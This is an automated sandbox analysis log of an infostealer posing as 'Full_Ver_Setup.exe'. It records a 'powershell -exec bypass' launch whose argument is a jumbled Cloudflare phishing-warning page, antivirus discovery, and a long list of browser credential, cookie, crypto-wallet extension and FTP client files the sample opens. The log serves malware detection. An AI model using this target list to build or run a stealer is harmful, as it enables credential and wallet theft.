0;">suspected phishing</h2> <strong>this website has been reported for potential phishing.</strong> <p>phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">learn more</a> <form action="/cdn-cgi/phish-bypass" method="get" enctype="text/plain"> <input type="hidden" name="atok" value="y0.m3twogxwcjmvny1xqkkmdmwzkl6dwzxbd26bzmmi-1734906652-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">ignore & proceed</button> </form> </p> </div> <
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass <!doctype html> <!--[if lt ie 7]> <html class="no-js ie6 oldie" lang="en-us"> <![endif]--> <!--[if ie 7]> <html class="no-js ie7 oldie" lang="en-us"> <![endif]--> <!--[if ie 8]> <html class="no-js ie8 oldie" lang="en-us"> <![endif]--> <!--[if gt ie 8]><!--> <html class="no-js" lang="en-us"> <!--<![endif]--> <head> <title>suspected phishing site | cloudflare</title> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="x-ua-compatible" content="ie=edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt ie 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte ie 10]><!--> <script> if (!navigator.cookieenabled) { window.addeventlistener('domcontentloaded', function () { var cookieel = document.getelementbyid('cookie-alert'); cookieel.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> warning</h4> <h2 style="margin: 16px 0;">suspected phishing</h2> <strong>this website has been reported for potential phishing.</strong> <p>phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">learn more</a> <form action="/cdn-cgi/phish-bypass" method="get" enctype="text/plain"> <input type="hidden" name="atok" value="y0.m3twogxwcjmvny1xqkkmdmwzkl6dwzxbd26bzmmi-1734906652-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">ignore & proceed</button> </form> </p> </div> < Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: Full_Ver_Setup.exe, 00000000.00000003.2012801885.0000000000862000.00000004.00000020.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1998784204.0000000000862000.00000004.00000020.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1998301688.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1998301688.00000000007D5000.00000004.00000020.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.2012326508.0000000000861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

barindex
Source: Yara match File source: Process Memory Space: Full_Ver_Setup.exe PID: 6476, type: MEMORYSTR
Source: Yara match File source: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Full_Ver_Setup.exe, 00000000.00000002.2174587319.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: *electrum*
Source: Full_Ver_Setup.exe, 00000000.00000003.1992604404.0000000000810000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\ElectronCash\wallets
Source: Full_Ver_Setup.exe, 00000000.00000003.1992604404.0000000000810000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/JAXX New Version
Source: Full_Ver_Setup.exe, 00000000.00000003.1922392393.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Bitcoin\\wallets","m":["*"],"z":"Wallets/Bitcoin core","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Binance","m":["app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets`e
Source: Full_Ver_Setup.exe, 00000000.00000003.1992604404.0000000000810000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: Full_Ver_Setup.exe, 00000000.00000002.2174587319.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: *exodus*
Source: Full_Ver_Setup.exe, 00000000.00000002.2174587319.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: *ethereum*
Source: Full_Ver_Setup.exe, 00000000.00000003.1971070887.00000000007C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: Full_Ver_Setup.exe, 00000000.00000003.1970914700.0000000000839000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
Source: Full_Ver_Setup.exe, 00000000.00000003.1922088795.000000000084D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live]$
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Roaming\FTPbox Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Roaming\FTPRush Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla Jump to behavior
